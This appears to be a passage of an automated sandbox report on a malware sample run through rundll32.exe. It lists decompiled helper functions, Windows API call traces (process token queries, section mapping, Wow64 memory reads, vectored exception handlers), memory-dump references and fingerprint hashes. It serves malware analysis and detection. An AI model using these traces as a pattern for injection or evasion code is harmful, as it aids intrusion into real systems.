						} else {
							_t42 = _t22 - _a4;
							memcpy(_t34, _a4, _t42);
							 *((char*)(_t34 + _t42)) = 0;
							__imp__(_t30, _v8);
						}
						 *_a8 = _t34;
						_t37 = 1;
						 *_a12 = _t30;
					}
				}
				return _t37;
			}














                                                            0x00dd4eef
                                                            0x00dd4ef9
                                                            0x00dd4efb
                                                            0x00dd4f01
                                                            0x00dd4f01
                                                            0x00dd4f0a
                                                            0x00dd4f0e
                                                            0x00dd4f1a
                                                            0x00dd4f1e
                                                            0x00dd4f92
                                                            0x00dd4f20
                                                            0x00dd4f20
                                                            0x00dd4f24
                                                            0x00dd4f2b
                                                            0x00dd4f2e
                                                            0x00dd4f48
                                                            0x00dd4f37
                                                            0x00dd4f37
                                                            0x00dd4f3b
                                                            0x00dd4f3e
                                                            0x00dd4f43
                                                            0x00dd4f43
                                                            0x00dd4f4d
                                                            0x00dd4f75
                                                            0x00dd4f7b
                                                            0x00dd4f7e
                                                            0x00dd4f4f
                                                            0x00dd4f51
                                                            0x00dd4f59
                                                            0x00dd4f64
                                                            0x00dd4f69
                                                            0x00dd4f69
                                                            0x00dd4f85
                                                            0x00dd4f8c
                                                            0x00dd4f8d
                                                            0x00dd4f8d
                                                            0x00dd4f1e
                                                            0x00dd4f9d

                                                            APIs
                                                            • lstrlen.KERNEL32(00000000,0000EA60,?,00000008,?,?,00DD69C2,00000000,00000000,00000000,039C9698,?,?,00DD3771,?,039C9698), ref: 00DD4EFB
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                              • Part of subcall function 00DD783A: StrChrA.SHLWAPI(?,0000002F,00000000,00000000,00DD4F29,00000000,00000001,00000001,?,?,00DD69C2,00000000,00000000,00000000,039C9698), ref: 00DD7848
                                                              • Part of subcall function 00DD783A: StrChrA.SHLWAPI(?,0000003F,?,?,00DD69C2,00000000,00000000,00000000,039C9698,?,?,00DD3771,?,039C9698,0000EA60,?), ref: 00DD7852
                                                            • memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,00DD69C2,00000000,00000000,00000000,039C9698,?,?,00DD3771), ref: 00DD4F59
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00DD4F69
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 00DD4F75
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: lstrcpy$AllocateHeaplstrlenmemcpy
                                                            • String ID:
                                                            • API String ID: 3767559652-0
                                                            • Opcode ID: 6fbe79ca8964b823305c74d705d70b30aafbdd7918aa15cd7ffdfa5ef324960f
                                                            • Instruction ID: 07245ea172b15eb58d91df9ce3254dd0f0356ce5cc28d8eac342215f148e8265
                                                            • Opcode Fuzzy Hash: 6fbe79ca8964b823305c74d705d70b30aafbdd7918aa15cd7ffdfa5ef324960f
                                                            • Instruction Fuzzy Hash: 57219076504255BFCB025F78CC44AAE7FA8DF06390B058096F9489B321E731C901D7B1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04569FAF, Relevance: 5.1, APIs: 4, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: memset
                                                            • String ID:
                                                            • API String ID: 2221118986-0
                                                            • Opcode ID: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction ID: 25665d5cfdefc4c6e3b7ff31a6856e5e6cd051fc6171c2afe03f8ec7cf295684
                                                            • Opcode Fuzzy Hash: 8de7f7e231b166f2716af6db8127298234bc8a7c57dad98130b045f549be7daa
                                                            • Instruction Fuzzy Hash: 9311A77250050AFFDB105F60FC44A667739FF09328B040124F94596811D772B9B1EBE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD73AF, Relevance: 5.0, APIs: 4, Instructions: 39stringCOMMON
                                                            Download Yara Rule
                                                            C-Code - Quality: 100%
                                                            			E00DD73AF(void* __ecx, WCHAR* _a4, WCHAR* _a8) {
				void* _v8;
				void* _t18;
				int _t25;
				int _t29;
				int _t34;

				_t29 = lstrlenW(_a4);
				_t25 = lstrlenW(_a8);
				_t18 = E00DD77D7(_t25 + _t29 + _t25 + _t29 + 2);
				_v8 = _t18;
				if(_t18 != 0) {
					_t34 = _t29 + _t29;
					memcpy(_t18, _a4, _t34);
					_t10 = _t25 + 2; // 0x2
					memcpy(_v8 + _t34, _a8, _t25 + _t10);
				}
				return _v8;
			}








                                                            0x00dd73c4
                                                            0x00dd73c8
                                                            0x00dd73d2
                                                            0x00dd73d9
                                                            0x00dd73dc
                                                            0x00dd73de
                                                            0x00dd73e6
                                                            0x00dd73eb
                                                            0x00dd73f9
                                                            0x00dd73fe
                                                            0x00dd7408

                                                            APIs
                                                            • lstrlenW.KERNEL32(004F0053,?,73B75520,00000008,039C930C,?,00DD1543,004F0053,039C930C,?,?,?,?,?,?,00DD6DBE), ref: 00DD73BF
                                                            • lstrlenW.KERNEL32(00DD1543,?,00DD1543,004F0053,039C930C,?,?,?,?,?,?,00DD6DBE), ref: 00DD73C6
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • memcpy.NTDLL(00000000,004F0053,73B769A0,?,?,00DD1543,004F0053,039C930C,?,?,?,?,?,?,00DD6DBE), ref: 00DD73E6
                                                            • memcpy.NTDLL(73B769A0,00DD1543,00000002,00000000,004F0053,73B769A0,?,?,00DD1543,004F0053,039C930C), ref: 00DD73F9
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: lstrlenmemcpy$AllocateHeap
                                                            • String ID:
                                                            • API String ID: 2411391700-0
                                                            • Opcode ID: 6f4a0af0d044df2806cc67381d63462fe1005a181afc0c58d7e55661128f0e0d
                                                            • Instruction ID: abdf4110302ffbaee877d1315ea5d231561245e9d412a5e739dab57fb5f1ab2f
                                                            • Opcode Fuzzy Hash: 6f4a0af0d044df2806cc67381d63462fe1005a181afc0c58d7e55661128f0e0d
                                                            • Instruction Fuzzy Hash: D5F0E776901118BB8F11EBA9CC85C9E7BACEF093547154063FA08D7212E635EA159BB0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045688D8, Relevance: 5.0, APIs: 4, Instructions: 38stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(69B25F44,00000000,?,00000000,04571E61,00000000,?,?,00000000,69B25F44,?,?,?,?,?,69B25F44), ref: 045688E9
                                                            • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,045738EE), ref: 045688EE
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • memcpy.NTDLL(00000000,?,00000000,?,?,?,?,?,?,?,045738EE), ref: 0456890A
                                                            • lstrcpy.KERNEL32(00000000,00000000), ref: 04568928
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcpymemcpy
                                                            • String ID:
                                                            • API String ID: 1697500751-0
                                                            • Opcode ID: 7d676b23a97bcf1541932eaa80d8e1da77b9684c2ec47941877d95c779e4b5d3
                                                            • Instruction ID: c2326c70386fa81aec8b948d0918eb69debc605cf71fbd053caf8be86f61b1f2
                                                            • Opcode Fuzzy Hash: 7d676b23a97bcf1541932eaa80d8e1da77b9684c2ec47941877d95c779e4b5d3
                                                            • Instruction Fuzzy Hash: B9F0F67B405741ABD3316E69AC48E5B7B9CFFC5311F040015E94693210DB35E818EBB2
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 045695DD, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(049B9986,00000000,73BB81D0,00000000,045763E9,00000000), ref: 045695ED
                                                            • lstrlen.KERNEL32(?), ref: 045695F5
                                                              • Part of subcall function 04583C35: RtlAllocateHeap.NTDLL(00000000,?,04580BE2), ref: 04583C41
                                                            • lstrcpy.KERNEL32(00000000,049B9986), ref: 04569609
                                                            • lstrcat.KERNEL32(00000000,?), ref: 04569614
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1184927255.0000000004560000.00000040.00020000.sdmp, Offset: 04560000, based on PE: false
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                            • String ID:
                                                            • API String ID: 74227042-0
                                                            • Opcode ID: 8326c6ed7f02b05f08e457afa8e61c46921ad44cc47644bb3629fb9b183a81e6
                                                            • Instruction ID: a5144b08e7b2b04795714005257dafc028eb3d01fc2f07e801a35a04b3b3fab6
                                                            • Opcode Fuzzy Hash: 8326c6ed7f02b05f08e457afa8e61c46921ad44cc47644bb3629fb9b183a81e6
                                                            • Instruction Fuzzy Hash: 99E0ED73501225E787115BE9AC48C5FBBACFF99651704041AF601A3101CB299C19ABA9
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 00DD7067, Relevance: 5.0, APIs: 4, Instructions: 27stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • lstrlen.KERNEL32(039C887A,00000000,00000000,00000000,00DD730A,00000000), ref: 00DD7077
                                                            • lstrlen.KERNEL32(?), ref: 00DD707F
                                                              • Part of subcall function 00DD77D7: RtlAllocateHeap.NTDLL(00000000,00000000,00DD1275), ref: 00DD77E3
                                                            • lstrcpy.KERNEL32(00000000,039C887A), ref: 00DD7093
                                                            • lstrcat.KERNEL32(00000000,?), ref: 00DD709E
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1178377848.0000000000DD1000.00000020.00020000.sdmp, Offset: 00DD0000, based on PE: true
                                                            • Associated: 00000000.00000002.1178353888.0000000000DD0000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178492117.0000000000DD9000.00000002.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178536827.0000000000DDA000.00000004.00020000.sdmp Download File
                                                            • Associated: 00000000.00000002.1178636069.0000000000DDC000.00000002.00020000.sdmp Download File
                                                            Similarity
                                                            • API ID: lstrlen$AllocateHeaplstrcatlstrcpy
                                                            • String ID:
                                                            • API String ID: 74227042-0
                                                            • Opcode ID: 661e91b35804a2af267b41c2be250c48a676295a47b4deacd96eefcb84d573f5
                                                            • Instruction ID: d7c9adee2cb309094a8a3a7093511b653332fe5e987e5a26fed0adcaf4221ae6
                                                            • Opcode Fuzzy Hash: 661e91b35804a2af267b41c2be250c48a676295a47b4deacd96eefcb84d573f5
                                                            • Instruction Fuzzy Hash: 89E01273906325AB87115BE8AC48CAFFBADEF897517084457F600D3310D7259805CBF1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Analysis Process: rundll32.exe PID: 1848 Parent PID: 484 rundll32.exeCOMMON

                                                            Executed Functions

                                                            Function 04BA7FDD, Relevance: 39.3, APIs: 26, Instructions: 336memorylibrarynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • RtlInitializeCriticalSection.NTDLL(04BCC328), ref: 04BA7FFB
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • memset.NTDLL ref: 04BA802C
                                                            • RtlInitializeCriticalSection.NTDLL(05C8B148), ref: 04BA803D
                                                              • Part of subcall function 04BAD464: RtlInitializeCriticalSection.NTDLL(04BCC300), ref: 04BAD488
                                                              • Part of subcall function 04BAD464: RtlInitializeCriticalSection.NTDLL(04BCC2E0), ref: 04BAD49E
                                                              • Part of subcall function 04BAD464: GetVersion.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BAD4AF
                                                              • Part of subcall function 04BAD464: GetModuleHandleA.KERNEL32(0000170B), ref: 04BAD4E3
                                                              • Part of subcall function 04BC3D51: RtlAllocateHeap.NTDLL(00000000,-00000003,77109EB0), ref: 04BC3D6B
                                                            • CreateMutexA.KERNEL32(00000000,00000001,00000000,00000060), ref: 04BA8066
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BA8077
                                                            • CloseHandle.KERNEL32(00000428), ref: 04BA808B
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04BA80D4
                                                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BA80E7
                                                            • GetUserNameA.ADVAPI32(00000000,?), ref: 04BA80FC
                                                            • NtQueryInformationProcess.NTDLL(00000000,?,00000018,?), ref: 04BA812C
                                                            • OpenProcess.KERNEL32(00000400,00000000,00000000), ref: 04BA8141
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BA814B
                                                            • CloseHandle.KERNEL32(00000000), ref: 04BA8158
                                                            • GetShellWindow.USER32 ref: 04BA8173
                                                            • GetWindowThreadProcessId.USER32(00000000), ref: 04BA817A
                                                            • memcpy.NTDLL(04BCC1E4,?,00000018), ref: 04BA81B6
                                                            • CreateEventA.KERNEL32(04BCC1A8,00000001,00000000,00000000,?,00000001), ref: 04BA8239
                                                            • RtlAllocateHeap.NTDLL(00000000,00000018,?), ref: 04BA8263
                                                            • OpenEventA.KERNEL32(00100000,00000000,05C8A9E0), ref: 04BA828B
                                                            • CreateEventA.KERNEL32(04BCC1A8,00000001,00000000,05C8A9E0), ref: 04BA829E
                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,04BB3914), ref: 04BA82A4
                                                            • GetLastError.KERNEL32(04BB4A5B,04BCC0FC,04BCC100), ref: 04BA832A
                                                            • LoadLibraryA.KERNEL32(?,04BB4A5B,04BCC0FC,04BCC100), ref: 04BA8345
                                                            • SetEvent.KERNEL32(?,04BAD17E,00000000,00000000), ref: 04BA83DA
                                                            • RtlAllocateHeap.NTDLL(00000000,00000052,04BAD17E), ref: 04BA83EF
                                                            • wsprintfA.USER32 ref: 04BA841F
                                                              • Part of subcall function 04BBDB4F: HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,00000000,04BA83BB,04BAD17E,00000000,00000000), ref: 04BBDBC5
                                                              • Part of subcall function 04BC398C: HeapFree.KERNEL32(00000000,00000000,00000000,1D4E36C0,?,00000000,?,?,?,00000000,04BA83C0,04BAD17E,00000000,00000000), ref: 04BC39FD
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Heap$Allocate$CriticalErrorEventInitializeLastSection$CreateHandleProcess$CloseFreeNameOpenUserWindow$InformationLibraryLoadModuleMutexQueryShellThreadVersionmemcpymemsetwsprintf
                                                            • String ID:
                                                            • API String ID: 2659885799-0
                                                            • Opcode ID: 389bb61aefb3dd46b02d6a6c9a38a1a0667812d30f7b65a5812a359df4e4a0c2
                                                            • Instruction ID: 9dcdcefc0db46f9f14634b0b7d96ff35a8453d96b00c3f7bc2f7e0137dce8fe1
                                                            • Opcode Fuzzy Hash: 389bb61aefb3dd46b02d6a6c9a38a1a0667812d30f7b65a5812a359df4e4a0c2
                                                            • Instruction Fuzzy Hash: 66C19E709083099FD720AF69E8C492A7BF8FB58705B40489FF54AD7640DB78BC658B71
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB37F9, Relevance: 12.1, APIs: 8, Instructions: 114stringCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(?,00000001,04BCC1AC,00000000), ref: 04BB3827
                                                            • StrRChrA.SHLWAPI(05C8A5B0,00000000,0000005C,00000000,00000001,00000000,04BCC16C,00000000,?), ref: 04BB383C
                                                            • _strupr.NTDLL ref: 04BB3852
                                                            • lstrlen.KERNEL32(05C8A5B0), ref: 04BB385A
                                                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,00000001,00000000,04BCC16C,00000000,?), ref: 04BB38DA
                                                            • RtlAddVectoredExceptionHandler.NTDLL(00000000,04BB0001), ref: 04BB3901
                                                            • GetLastError.KERNEL32(?), ref: 04BB391B
                                                            • RtlRemoveVectoredExceptionHandler.NTDLL(050305B8), ref: 04BB3931
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: DescriptorExceptionHandlerSecurityVectored$ConvertCreateErrorEventLastRemoveString_struprlstrlen
                                                            • String ID:
                                                            • API String ID: 1098824789-0
                                                            • Opcode ID: 78c4eeb2a6976583b166e8a2ed1a166cf101953d5ac6a693a85bb522354ff5e0
                                                            • Instruction ID: 22bbcba414bb1fa1f73b5ef61bc09339518cb77974f5a36aeb2f92d7242b87ca
                                                            • Opcode Fuzzy Hash: 78c4eeb2a6976583b166e8a2ed1a166cf101953d5ac6a693a85bb522354ff5e0
                                                            • Instruction Fuzzy Hash: 1E31B171A001159FEB10AF75DCC4ABE7BF8EB1C704B0105AAEAD6E3141D6B9AC548BE1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BADE77, Relevance: 10.6, APIs: 7, Instructions: 81nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtOpenProcess.NTDLL(00000000,00000400,?,00000000), ref: 04BADEBE
                                                            • NtOpenProcessToken.NTDLL(00000000,00000008,00000001), ref: 04BADED1
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 04BADEED
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                            • NtQueryInformationToken.NTDLL(00000001,00000001,00000000,00000000,00000000), ref: 04BADF0A
                                                            • memcpy.NTDLL(00000000,00000000,0000001C), ref: 04BADF17
                                                            • NtClose.NTDLL(00000001), ref: 04BADF29
                                                            • NtClose.NTDLL(00000000), ref: 04BADF33
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Token$CloseInformationOpenProcessQuery$AllocateHeapmemcpy
                                                            • String ID:
                                                            • API String ID: 2575439697-0
                                                            • Opcode ID: 040cf6d38ef00bba1ee6bf642cb2d58b34ee087039229581b086806b82748cd4
                                                            • Instruction ID: caa2d1d1d949ec877bbbc0424e389782bbbfad4dd3bbf28951ce18ec4f5c9638
                                                            • Opcode Fuzzy Hash: 040cf6d38ef00bba1ee6bf642cb2d58b34ee087039229581b086806b82748cd4
                                                            • Instruction Fuzzy Hash: FA2125B2A00218BBDF019FA4DC84EDEBFBEEF0C750F104066F901EA110D7769A549BA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA1305, Relevance: 9.1, APIs: 6, Instructions: 94threadmemorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetSystemTimeAsFileTime.KERNEL32(?), ref: 04BA1330
                                                            • HeapCreate.KERNEL32(00000000,00400000,00000000), ref: 04BA133D
                                                            • NtQueryInformationThread.NTDLL(000000FE,00000009,?,00000004,?), ref: 04BA13C9
                                                            • GetModuleHandleA.KERNEL32(00000000), ref: 04BA13D4
                                                            • RtlImageNtHeader.NTDLL(00000000), ref: 04BA13DD
                                                            • RtlExitUserThread.NTDLL(00000000), ref: 04BA13F2
                                                              • Part of subcall function 04BA2730: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04BA136B,?), ref: 04BA2738
                                                              • Part of subcall function 04BA2730: GetVersion.KERNEL32 ref: 04BA2747
                                                              • Part of subcall function 04BA2730: GetCurrentProcessId.KERNEL32 ref: 04BA2756
                                                              • Part of subcall function 04BA2730: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04BA2773
                                                              • Part of subcall function 04BB5020: memcpy.NTDLL(00000000,00000000,?,?,00000000,00000001,?,?,00000000,?,?,?,?,04BA1379,?), ref: 04BB507F
                                                              • Part of subcall function 04BBB54C: GetModuleFileNameW.KERNEL32(?,00000000,00000104,00000208,00000000,00000000,?,?,04BA138B,00000000,04BCC16C,00000000), ref: 04BBB572
                                                              • Part of subcall function 04BB527F: OpenProcess.KERNEL32(00000400,00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB529A
                                                              • Part of subcall function 04BB527F: IsWow64Process.KERNEL32(00000000,?,00000000,00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52AB
                                                              • Part of subcall function 04BB527F: CloseHandle.KERNEL32(00000000,?,?,04BA13A2,00000000,04BCC16C,00000000,?), ref: 04BB52BE
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Process$CreateFileHandleModuleOpenThreadTime$CloseCurrentEventExitHeaderHeapImageInformationNameQuerySystemUserVersionWow64memcpy
                                                            • String ID:
                                                            • API String ID: 3825956196-0
                                                            • Opcode ID: 7b1b110d178b1d4bdfe7ab9dca43b730673c1715c079e916c1831070923aa0be
                                                            • Instruction ID: e8a1a03ae965de19fac60cc1002e2583d78586c078499d61f2a5cebac9cb38a4
                                                            • Opcode Fuzzy Hash: 7b1b110d178b1d4bdfe7ab9dca43b730673c1715c079e916c1831070923aa0be
                                                            • Instruction Fuzzy Hash: 3731A271A04214BFCB21EF69D8C4DAE77F8EB48754F1041A6E552EB640E674AD50CBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB969C, Relevance: 7.7, APIs: 5, Instructions: 234nativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memcpy.NTDLL(?,04BC2C28,00000800,?,?,00000000,00000000), ref: 04BB98DD
                                                              • Part of subcall function 04BAF7AF: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,?,04BB97AB,?,?,?,00000000,00000000), ref: 04BAF7D4
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF7F6
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF80C
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF822
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF838
                                                              • Part of subcall function 04BAF7AF: GetProcAddress.KERNEL32(00000000,?), ref: 04BAF84E
                                                              • Part of subcall function 04BB680B: NtMapViewOfSection.NTDLL(00000000,000000FF,04BBA293,00000000,00000000,04BBA293,00000000,00000002,00000000,?,?,00000000,04BBA293,000000FF,00000000), ref: 04BB6839
                                                              • Part of subcall function 04BA85E6: memcpy.NTDLL(?,?,?,?,?,?,04BADC59,04BADC59,?,?,?,00000000,00000000), ref: 04BA864C
                                                              • Part of subcall function 04BA85E6: memcpy.NTDLL(00000000,?,?), ref: 04BA86AB
                                                            • memcpy.NTDLL(?,?,?,?,?,04BADC59,04BADC59,04BADC59,?,?,?,00000000,00000000), ref: 04BB980A
                                                            • memcpy.NTDLL(?,?,00000018,?,?,04BADC59,04BADC59,04BADC59,?,?,?,00000000,00000000), ref: 04BB9856
                                                            • NtUnmapViewOfSection.NTDLL(000000FF,00000000,00000000,00000000), ref: 04BB991B
                                                            • memset.NTDLL ref: 04BB995D
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcmemcpy$SectionView$HandleModuleUnmapmemset
                                                            • String ID:
                                                            • API String ID: 1575695328-0
                                                            • Opcode ID: b2205e6acc163104afdd7307a6e0e830b45e464f61c84a579cfe65a350509657
                                                            • Instruction ID: 8ef89ef879e564c5bb2c6b73c349f66205daac20955e14ff72b39f1a47488cf1
                                                            • Opcode Fuzzy Hash: b2205e6acc163104afdd7307a6e0e830b45e464f61c84a579cfe65a350509657
                                                            • Instruction Fuzzy Hash: 52914CB1900209EFDB11DF98C980BEEBBB5FF08304F1444A9E995A7250D7B0BA54DFA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA92F3, Relevance: 4.7, APIs: 3, Instructions: 168librarynativeloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetProcAddress.KERNEL32(?,00000318), ref: 04BA9318
                                                            • NtWow64QueryInformationProcess64.NTDLL(00000000,00000000,?,00000030,00000000), ref: 04BA9334
                                                              • Part of subcall function 04BC3C35: RtlAllocateHeap.NTDLL(00000000,?,04BC0BE2), ref: 04BC3C41
                                                              • Part of subcall function 04BA6EB0: GetProcAddress.KERNEL32(?,00000000), ref: 04BA6ED9
                                                              • Part of subcall function 04BA6EB0: NtWow64ReadVirtualMemory64.NTDLL(00000100,?,?,00000028,00000000,00000000,00000100,00000000,?,?,?,04BA9375,00000000,00000000,00000028,00000100), ref: 04BA6EFB
                                                            • StrRChrA.SHLWAPI(00000018,00000000,0000005C,00000000,00000318,?,00000000,00000068,00000098,00000000,00000028,00000040,00000000,00000000,00000028,00000100), ref: 04BA949E
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressProcWow64$AllocateHeapInformationMemory64Process64QueryReadVirtual
                                                            • String ID:
                                                            • API String ID: 3547194813-0
                                                            • Opcode ID: c0b1743d8d5d6a1a76f52f6185ba0ebc141dda7d61fd40d221b6d6001c745afc
                                                            • Instruction ID: 19c770431f8d45c5204a9cceaf81534690e416d3b25971808b29d474ec1f2e5f
                                                            • Opcode Fuzzy Hash: c0b1743d8d5d6a1a76f52f6185ba0ebc141dda7d61fd40d221b6d6001c745afc
                                                            • Instruction Fuzzy Hash: 456131B1A0421AAFDF54CF99C880BEEB7B4FF08704F148599D914E7241DB34E964DBA0
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BB5AED, Relevance: 4.6, APIs: 3, Instructions: 56librarynativeloaderCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • memset.NTDLL ref: 04BB5B01
                                                            • GetProcAddress.KERNEL32(?), ref: 04BB5B29
                                                            • NtWow64QueryInformationProcess64.NTDLL(?,00000000,?,00000030,00000000,?,00001000,00000000), ref: 04BB5B47
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: AddressInformationProcProcess64QueryWow64memset
                                                            • String ID:
                                                            • API String ID: 2968673968-0
                                                            • Opcode ID: 27dea607931315bc5c77e4d4727b74507552571f91502560657624ed1b5e2fa6
                                                            • Instruction ID: 2b62d6cc48a5ebc015c72cda4557168a7b129893117d933866270d3727af2bdb
                                                            • Opcode Fuzzy Hash: 27dea607931315bc5c77e4d4727b74507552571f91502560657624ed1b5e2fa6
                                                            • Instruction Fuzzy Hash: FA115E71A04219BFDB20DF99DC85FA97BB8EB48704F054065EA08EB290E774ED15CBA1
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Function 04BA4173, Relevance: 4.5, APIs: 3, Instructions: 29memorynativeCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • NtAllocateVirtualMemory.NTDLL(04BA489B,00000000,00000000,04BA489B,00003000,00000040), ref: 04BA41A4
                                                            • RtlNtStatusToDosError.NTDLL(00000000), ref: 04BA41AB
                                                            • SetLastError.KERNEL32(00000000), ref: 04BA41B2
                                                            Memory Dump Source
                                                            • Source File: 00000003.00000002.949744075.0000000004BA0000.00000040.00020000.sdmp, Offset: 04BA0000, based on PE: false
                                                            Similarity
                                                            • API ID: Error$AllocateLastMemoryStatusVirtual
                                                            • String ID:
                                                            • API String ID: 722216270-0
                                                            • Opcode ID: a798538a86cfe35d21a12c52c7bb20b0305b648a9e667bc182bdca5063c72ef6
                                                            • Instruction ID: 2e358022d0eaf15f64f8d45179fedea4c32bddef4052e5850eb1c10fa7fd9c59
                                                            • Opcode Fuzzy Hash: a798538a86cfe35d21a12c52c7bb20b0305b648a9e667bc182bdca5063c72ef6
